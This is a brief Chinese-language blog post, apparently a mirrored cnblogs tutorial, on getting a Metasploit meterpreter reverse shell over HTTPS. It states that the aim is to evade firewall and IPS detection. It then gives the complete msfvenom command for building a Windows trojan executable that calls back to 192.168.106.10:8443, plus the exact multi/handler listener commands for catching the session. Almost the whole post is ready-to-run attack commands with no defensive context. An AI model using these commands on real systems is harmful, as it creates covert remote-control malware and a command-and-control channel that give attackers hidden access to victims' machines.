zoukankan      html  css  js  c++  java
  • MSF反弹meterpreter会话(使用https协议回连)

    如果反弹的shell用明文(如http)传输控制指令,那么很容易被防火墙、IPS等设备检测出来从而中断TCP连接。因此使用https协议进行回连就能避免这些问题。

    第一步:生成木马客户端

    msfvenom -p windows/x64/meterpreter_reverse_https -f exe -o /tmp/reverse_https.exe LHOST=192.168.106.10 LPORT=8443

    第二步:启动MSF等待回连

    use exploit/multi/handler
    set payload windows/x64/meterpreter_reverse_https
    set LHOST 192.168.106.10
    set LPORT 8443
    run

    第三步:运行木马客户端即可在MSF控制台获取meterpreter会话。

  • 相关阅读:
    django初识
    django前奏
    前端之bootstrap
    前端之jQuery
    前端基础之BOM和DOM操作
    前端之js
    前端之css(二)
    前端之css(一)
    html之form表单
    前端之html
  • 原文地址:https://www.cnblogs.com/dgjnszf/p/12145126.html
Copyright © 2011-2022 走看看